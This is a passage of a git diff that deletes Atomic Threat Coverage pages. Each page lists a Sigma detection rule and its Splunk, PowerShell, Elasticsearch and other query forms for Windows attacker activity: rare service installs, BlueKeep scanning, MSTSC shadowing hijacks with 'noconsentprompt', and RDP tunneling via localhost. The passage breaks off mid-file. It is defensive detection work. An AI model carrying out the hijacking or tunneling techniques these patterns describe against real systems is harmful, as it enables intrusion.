-Feel free to contribute for fun and fame, this is open source :) -> https://github.com/Neo23x0/sigma
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Security" EventCode="4698") | eventstats count as val by TaskName| search val < 5
-```
-
-
-### logpoint
-    
-```
-(event_source="Microsoft-Windows-Security-Auditing" event_id="4698") | chart count() as val by TaskName | search val < 5
-```
-
-
-### grep
-    
-```
-grep -P '^4698'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_rare_service_installs.md b/Atomic_Threat_Coverage/Detection_Rules/win_rare_service_installs.md
deleted file mode 100644
index 06f721a..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_rare_service_installs.md
+++ /dev/null
@@ -1,191 +0,0 @@
-| Title                    | Rare Service Installs       |
-|:-------------------------|:------------------|
-| **Description**          | Detects rare service installs that only appear a few times per time frame and could reveal password dumpers, backdoor installs or other types of malicious services |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0003: Persistence](https://attack.mitre.org/tactics/TA0003)</li><li>[TA0004: Privilege Escalation](https://attack.mitre.org/tactics/TA0004)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1050: New Service](https://attack.mitre.org/techniques/T1050)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | low |
-| **False Positives**      | <ul><li>Software installation</li><li>Software updates</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           |  There are no documented References for this Detection Rule yet  |
-| **Author**               | Florian Roth |
-| Other Tags           | <ul><li>car.2013-09-005</li><li>attack.t1543.003</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Rare Service Installs
-id: 66bfef30-22a5-4fcd-ad44-8d81e60922ae
-description: Detects rare service installs that only appear a few times per time frame and could reveal password dumpers, backdoor installs or other types of malicious services
-status: experimental
-author: Florian Roth
-date: 2017/03/08
-tags:
-    - attack.persistence
-    - attack.privilege_escalation
-    - attack.t1050
-    - car.2013-09-005
-    - attack.t1543.003
-logsource:
-    product: windows
-    service: system
-detection:
-    selection:
-        EventID: 7045
-    timeframe: 7d
-    condition: selection | count() by ServiceFileName < 5
-falsepositives:
-    - Software installation
-    - Software updates
-level: low
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName System | where {($_.ID -eq "7045") }  | group-object ServiceFileName | where { $_.count -lt 5 } | select name,count | sort -desc
-```
-
-
-### es-qs
-    
-```
-An unsupported feature is required for this Sigma rule (detection_rules/sigma/rules/windows/builtin/win_rare_service_installs.yml): Aggregations not implemented for this backend
-Feel free to contribute for fun and fame, this is open source :) -> https://github.com/Neo23x0/sigma
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/66bfef30-22a5-4fcd-ad44-8d81e60922ae <<EOF
-{
-  "metadata": {
-    "title": "Rare Service Installs",
-    "description": "Detects rare service installs that only appear a few times per time frame and could reveal password dumpers, backdoor installs or other types of malicious services",
-    "tags": [
-      "attack.persistence",
-      "attack.privilege_escalation",
-      "attack.t1050",
-      "car.2013-09-005",
-      "attack.t1543.003"
-    ],
-    "query": "winlog.event_id:\"7045\""
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "7d"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "winlog.event_id:\"7045\"",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          },
-          "aggs": {
-            "by": {
-              "terms": {
-                "field": "winlog.event_data.ServiceFileName",
-                "size": 10,
-                "order": {
-                  "_count": "asc"
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.aggregations.by.buckets.0.doc_count": {
-        "lt": 5
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Rare Service Installs'",
-        "body": "Hits:\n{{#aggregations.by.buckets}}\n {{key}} {{doc_count}}\n{{/aggregations.by.buckets}}\n",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-An unsupported feature is required for this Sigma rule (detection_rules/sigma/rules/windows/builtin/win_rare_service_installs.yml): Aggregations not implemented for this backend
-Feel free to contribute for fun and fame, this is open source :) -> https://github.com/Neo23x0/sigma
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:System" EventCode="7045") | eventstats count as val by ServiceFileName| search val < 5
-```
-
-
-### logpoint
-    
-```
-(event_source="Microsoft-Windows-Security-Auditing" event_id="7045") | chart count() as val by ServiceFileName | search val < 5
-```
-
-
-### grep
-    
-```
-grep -P '^7045'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_rdp_bluekeep_poc_scanner.md b/Atomic_Threat_Coverage/Detection_Rules/win_rdp_bluekeep_poc_scanner.md
deleted file mode 100644
index 40cecc6..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_rdp_bluekeep_poc_scanner.md
+++ /dev/null
@@ -1,175 +0,0 @@
-| Title                    | Scanner PoC for CVE-2019-0708 RDP RCE Vuln       |
-|:-------------------------|:------------------|
-| **Description**          | Detects the use of a scanner by zerosum0x0 that discovers targets vulnerable to  CVE-2019-0708 RDP RCE aka BlueKeep |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0008: Lateral Movement](https://attack.mitre.org/tactics/TA0008)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1210: Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | critical |
-| **False Positives**      | <ul><li>Unlikely</li></ul>  |
-| **Development Status**   |  Development Status wasn't defined for this Detection Rule yet  |
-| **References**           | <ul><li>[https://twitter.com/AdamTheAnalyst/status/1134394070045003776](https://twitter.com/AdamTheAnalyst/status/1134394070045003776)</li><li>[https://github.com/zerosum0x0/CVE-2019-0708](https://github.com/zerosum0x0/CVE-2019-0708)</li></ul>  |
-| **Author**               | Florian Roth (rule), Adam Bradbury (idea) |
-| Other Tags           | <ul><li>car.2013-07-002</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Scanner PoC for CVE-2019-0708 RDP RCE Vuln
-id: 8400629e-79a9-4737-b387-5db940ab2367
-description: Detects the use of a scanner by zerosum0x0 that discovers targets vulnerable to  CVE-2019-0708 RDP RCE aka BlueKeep
-references:
-    - https://twitter.com/AdamTheAnalyst/status/1134394070045003776
-    - https://github.com/zerosum0x0/CVE-2019-0708
-tags:
-    - attack.lateral_movement
-    - attack.t1210
-    - car.2013-07-002
-author: Florian Roth (rule), Adam Bradbury (idea)
-date: 2019/06/02
-logsource:
-    product: windows
-    service: security
-detection:
-    selection:
-        EventID: 4625
-        AccountName: AAAAAAA
-    condition: selection
-falsepositives:
-    - Unlikely
-level: critical
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Security | where {($_.ID -eq "4625" -and $_.message -match "AccountName.*AAAAAAA") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Security" AND winlog.event_id:"4625" AND winlog.event_data.AccountName:"AAAAAAA")
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/8400629e-79a9-4737-b387-5db940ab2367 <<EOF
-{
-  "metadata": {
-    "title": "Scanner PoC for CVE-2019-0708 RDP RCE Vuln",
-    "description": "Detects the use of a scanner by zerosum0x0 that discovers targets vulnerable to  CVE-2019-0708 RDP RCE aka BlueKeep",
-    "tags": [
-      "attack.lateral_movement",
-      "attack.t1210",
-      "car.2013-07-002"
-    ],
-    "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"4625\" AND winlog.event_data.AccountName:\"AAAAAAA\")"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"4625\" AND winlog.event_data.AccountName:\"AAAAAAA\")",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Scanner PoC for CVE-2019-0708 RDP RCE Vuln'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(EventID:"4625" AND AccountName:"AAAAAAA")
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Security" EventCode="4625" AccountName="AAAAAAA")
-```
-
-
-### logpoint
-    
-```
-(event_source="Microsoft-Windows-Security-Auditing" event_id="4625" AccountName="AAAAAAA")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*4625)(?=.*AAAAAAA))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_rdp_hijack_shadowing.md b/Atomic_Threat_Coverage/Detection_Rules/win_rdp_hijack_shadowing.md
deleted file mode 100644
index d97582d..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_rdp_hijack_shadowing.md
+++ /dev/null
@@ -1,169 +0,0 @@
-| Title                    | MSTSC Shadowing       |
-|:-------------------------|:------------------|
-| **Description**          | Detects RDP session hijacking by using MSTSC shadowing |
-| **ATT&amp;CK Tactic**    |   This Detection Rule wasn't mapped to ATT&amp;CK Tactic yet  |
-| **ATT&amp;CK Technique** |  This Detection Rule wasn't mapped to ATT&amp;CK Technique yet  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://twitter.com/kmkz_security/status/1220694202301976576](https://twitter.com/kmkz_security/status/1220694202301976576)</li><li>[https://github.com/kmkz/Pentesting/blob/master/Post-Exploitation-Cheat-Sheet](https://github.com/kmkz/Pentesting/blob/master/Post-Exploitation-Cheat-Sheet)</li></ul>  |
-| **Author**               | Florian Roth |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: MSTSC Shadowing
-id: 6ba5a05f-b095-4f0a-8654-b825f4f16334
-description: Detects RDP session hijacking by using MSTSC shadowing
-status: experimental
-author: Florian Roth
-date: 2020/01/24
-references:
-    - https://twitter.com/kmkz_security/status/1220694202301976576
-    - https://github.com/kmkz/Pentesting/blob/master/Post-Exploitation-Cheat-Sheet
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        CommandLine|contains|all: 
-            - 'noconsentprompt'
-            - 'shadow:'
-    condition: selection
-falsepositives:
-    - Unknown
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "CommandLine.*.*noconsentprompt.*" -and $_.message -match "CommandLine.*.*shadow:.*") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.CommandLine.keyword:*noconsentprompt* AND winlog.event_data.CommandLine.keyword:*shadow\:*)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/6ba5a05f-b095-4f0a-8654-b825f4f16334 <<EOF
-{
-  "metadata": {
-    "title": "MSTSC Shadowing",
-    "description": "Detects RDP session hijacking by using MSTSC shadowing",
-    "tags": "",
-    "query": "(winlog.event_data.CommandLine.keyword:*noconsentprompt* AND winlog.event_data.CommandLine.keyword:*shadow\\:*)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.CommandLine.keyword:*noconsentprompt* AND winlog.event_data.CommandLine.keyword:*shadow\\:*)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'MSTSC Shadowing'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(CommandLine.keyword:*noconsentprompt* AND CommandLine.keyword:*shadow\:*)
-```
-
-
-### splunk
-    
-```
-(CommandLine="*noconsentprompt*" CommandLine="*shadow:*")
-```
-
-
-### logpoint
-    
-```
-(event_id="1" CommandLine="*noconsentprompt*" CommandLine="*shadow:*")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*.*noconsentprompt.*)(?=.*.*shadow:.*))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_rdp_localhost_login.md b/Atomic_Threat_Coverage/Detection_Rules/win_rdp_localhost_login.md
deleted file mode 100644
index c8d789b..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_rdp_localhost_login.md
+++ /dev/null
@@ -1,181 +0,0 @@
-| Title                    | RDP Login from Localhost       |
-|:-------------------------|:------------------|
-| **Description**          | RDP login with localhost source address may be a tunnelled login |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0008: Lateral Movement](https://attack.mitre.org/tactics/TA0008)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1076: Remote Desktop Protocol](https://attack.mitre.org/techniques/T1076)</li><li>[T1021: Remote Services](https://attack.mitre.org/techniques/T1021)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html](https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html)</li></ul>  |
-| **Author**               | Thomas Patzke |
-| Other Tags           | <ul><li>car.2013-07-002</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: RDP Login from Localhost
-id: 51e33403-2a37-4d66-a574-1fda1782cc31
-description: RDP login with localhost source address may be a tunnelled login
-references:
-    - https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html
-date: 2019/01/28
-modified: 2019/01/29
-tags:
-    - attack.lateral_movement
-    - attack.t1076
-    - car.2013-07-002
-    - attack.t1021
-status: experimental
-author: Thomas Patzke
-logsource:
-    product: windows
-    service: security
-detection:
-    selection:
-        EventID: 4624
-        LogonType: 10
-        SourceNetworkAddress:
-            - "::1"
-            - "127.0.0.1"
-    condition: selection
-falsepositives:
-    - Unknown
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Security | where {($_.ID -eq "4624" -and $_.message -match "LogonType.*10" -and ($_.message -match "::1" -or $_.message -match "127.0.0.1")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Security" AND winlog.event_id:"4624" AND winlog.event_data.LogonType:"10" AND SourceNetworkAddress:("\:\:1" OR "127.0.0.1"))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/51e33403-2a37-4d66-a574-1fda1782cc31 <<EOF
-{
-  "metadata": {
-    "title": "RDP Login from Localhost",
-    "description": "RDP login with localhost source address may be a tunnelled login",
-    "tags": [
-      "attack.lateral_movement",
-      "attack.t1076",
-      "car.2013-07-002",
-      "attack.t1021"
-    ],
-    "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"4624\" AND winlog.event_data.LogonType:\"10\" AND SourceNetworkAddress:(\"\\:\\:1\" OR \"127.0.0.1\"))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"4624\" AND winlog.event_data.LogonType:\"10\" AND SourceNetworkAddress:(\"\\:\\:1\" OR \"127.0.0.1\"))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'RDP Login from Localhost'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(EventID:"4624" AND LogonType:"10" AND SourceNetworkAddress:("\:\:1" "127.0.0.1"))
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Security" EventCode="4624" LogonType="10" (SourceNetworkAddress="::1" OR SourceNetworkAddress="127.0.0.1"))
-```
-
-
-### logpoint
-    
-```
-(event_source="Microsoft-Windows-Security-Auditing" event_id="4624" logon_type="10" SourceNetworkAddress IN ["::1", "127.0.0.1"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*4624)(?=.*10)(?=.*(?:.*::1|.*127\.0\.0\.1)))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_rdp_potential_cve-2019-0708.md b/Atomic_Threat_Coverage/Detection_Rules/win_rdp_potential_cve-2019-0708.md
deleted file mode 100644
index 00f90f9..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_rdp_potential_cve-2019-0708.md
+++ /dev/null
@@ -1,182 +0,0 @@
-| Title                    | Potential RDP Exploit CVE-2019-0708       |
-|:-------------------------|:------------------|
-| **Description**          | Detect suspicious error on protocol RDP, potential CVE-2019-0708 |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0001: Initial Access](https://attack.mitre.org/tactics/TA0001)</li><li>[TA0008: Lateral Movement](https://attack.mitre.org/tactics/TA0008)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1210: Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210)</li><li>[T1190: Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Bad connections or network interruptions</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://github.com/zerosum0x0/CVE-2019-0708](https://github.com/zerosum0x0/CVE-2019-0708)</li><li>[https://github.com/Ekultek/BlueKeep](https://github.com/Ekultek/BlueKeep)</li></ul>  |
-| **Author**               | Lionel PRAT, Christophe BROCAS, @atc_project (improvements) |
-| Other Tags           | <ul><li>car.2013-07-002</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Potential RDP Exploit CVE-2019-0708
-id: aaa5b30d-f418-420b-83a0-299cb6024885
-description: Detect suspicious error on protocol RDP, potential CVE-2019-0708
-references:
-    - https://github.com/zerosum0x0/CVE-2019-0708
-    - https://github.com/Ekultek/BlueKeep
-tags:
-    - attack.initial_access
-    - attack.lateral_movement
-    - attack.t1210
-    - attack.t1190
-    - car.2013-07-002
-status: experimental
-author: "Lionel PRAT, Christophe BROCAS, @atc_project (improvements)"
-date: 2019/05/24
-logsource:
-    product: windows
-    service: system
-detection:
-    selection:
-        EventID:
-            - 56
-            - 50
-        Source: TermDD
-    condition: selection
-falsepositives:
-    - Bad connections or network interruptions
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName System | where {(($_.ID -eq "56" -or $_.ID -eq "50") -and $_.message -match "Source.*TermDD") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_id:("56" OR "50") AND winlog.event_data.Source:"TermDD")
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/aaa5b30d-f418-420b-83a0-299cb6024885 <<EOF
-{
-  "metadata": {
-    "title": "Potential RDP Exploit CVE-2019-0708",
-    "description": "Detect suspicious error on protocol RDP, potential CVE-2019-0708",
-    "tags": [
-      "attack.initial_access",
-      "attack.lateral_movement",
-      "attack.t1210",
-      "attack.t1190",
-      "car.2013-07-002"
-    ],
-    "query": "(winlog.event_id:(\"56\" OR \"50\") AND winlog.event_data.Source:\"TermDD\")"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_id:(\"56\" OR \"50\") AND winlog.event_data.Source:\"TermDD\")",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Potential RDP Exploit CVE-2019-0708'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(EventID:("56" "50") AND Source:"TermDD")
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:System" (EventCode="56" OR EventCode="50") Source="TermDD")
-```
-
-
-### logpoint
-    
-```
-(event_source="Microsoft-Windows-Security-Auditing" event_id IN ["56", "50"] Source="TermDD")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*56|.*50))(?=.*TermDD))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_rdp_reverse_tunnel.md b/Atomic_Threat_Coverage/Detection_Rules/win_rdp_reverse_tunnel.md
deleted file mode 100644
index 0b73618..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_rdp_reverse_tunnel.md
+++ /dev/null
@@ -1,193 +0,0 @@
-| Title                    | RDP over Reverse SSH Tunnel WFP       |
-|:-------------------------|:------------------|
-| **Description**          | Detects svchost hosting RDP termsvcs communicating with the loopback address |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li><li>[TA0011: Command and Control](https://attack.mitre.org/tactics/TA0011)</li><li>[TA0008: Lateral Movement](https://attack.mitre.org/tactics/TA0008)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1076: Remote Desktop Protocol](https://attack.mitre.org/techniques/T1076)</li><li>[T1090: Proxy](https://attack.mitre.org/techniques/T1090)</li><li>[T1021: Remote Services](https://attack.mitre.org/techniques/T1021)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://twitter.com/SBousseaden/status/1096148422984384514](https://twitter.com/SBousseaden/status/1096148422984384514)</li><li>[https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES/blob/master/Command%20and%20Control/DE_RDP_Tunnel_5156.evtx](https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES/blob/master/Command%20and%20Control/DE_RDP_Tunnel_5156.evtx)</li></ul>  |
-| **Author**               | Samir Bousseaden |
-| Other Tags           | <ul><li>car.2013-07-002</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: RDP over Reverse SSH Tunnel WFP
-id: 5bed80b6-b3e8-428e-a3ae-d3c757589e41
-status: experimental
-description: Detects svchost hosting RDP termsvcs communicating with the loopback address
-references:
-    - https://twitter.com/SBousseaden/status/1096148422984384514
-    - https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES/blob/master/Command%20and%20Control/DE_RDP_Tunnel_5156.evtx
-author: Samir Bousseaden
-date: 2019/02/16
-tags:
-    - attack.defense_evasion
-    - attack.command_and_control
-    - attack.lateral_movement
-    - attack.t1076
-    - attack.t1090
-    - car.2013-07-002
-    - attack.t1021
-logsource:
-    product: windows
-    service: security
-detection:
-    selection:
-        EventID: 5156
-    sourceRDP:
-        SourcePort: 3389
-        DestinationAddress:
-            - '127.*'
-            - '::1'
-    destinationRDP:
-        DestinationPort: 3389
-        SourceAddress:
-            - '127.*'
-            - '::1'
-    condition: selection and ( sourceRDP or destinationRDP )
-falsepositives:
-    - unknown
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Security | where {($_.ID -eq "5156" -and (($_.message -match "SourcePort.*3389" -and ($_.message -match "DestinationAddress.*127..*" -or $_.message -match "::1")) -or ($_.message -match "DestinationPort.*3389" -and ($_.message -match "SourceAddress.*127..*" -or $_.message -match "::1")))) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Security" AND winlog.event_id:"5156" AND ((winlog.event_data.SourcePort:"3389" AND DestinationAddress.keyword:(127.* OR \:\:1)) OR (winlog.event_data.DestinationPort:"3389" AND SourceAddress.keyword:(127.* OR \:\:1))))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/5bed80b6-b3e8-428e-a3ae-d3c757589e41 <<EOF
-{
-  "metadata": {
-    "title": "RDP over Reverse SSH Tunnel WFP",
-    "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.command_and_control",
-      "attack.lateral_movement",
-      "attack.t1076",
-      "attack.t1090",
-      "car.2013-07-002",
-      "attack.t1021"
-    ],
-    "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"5156\" AND ((winlog.event_data.SourcePort:\"3389\" AND DestinationAddress.keyword:(127.* OR \\:\\:1)) OR (winlog.event_data.DestinationPort:\"3389\" AND SourceAddress.keyword:(127.* OR \\:\\:1))))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
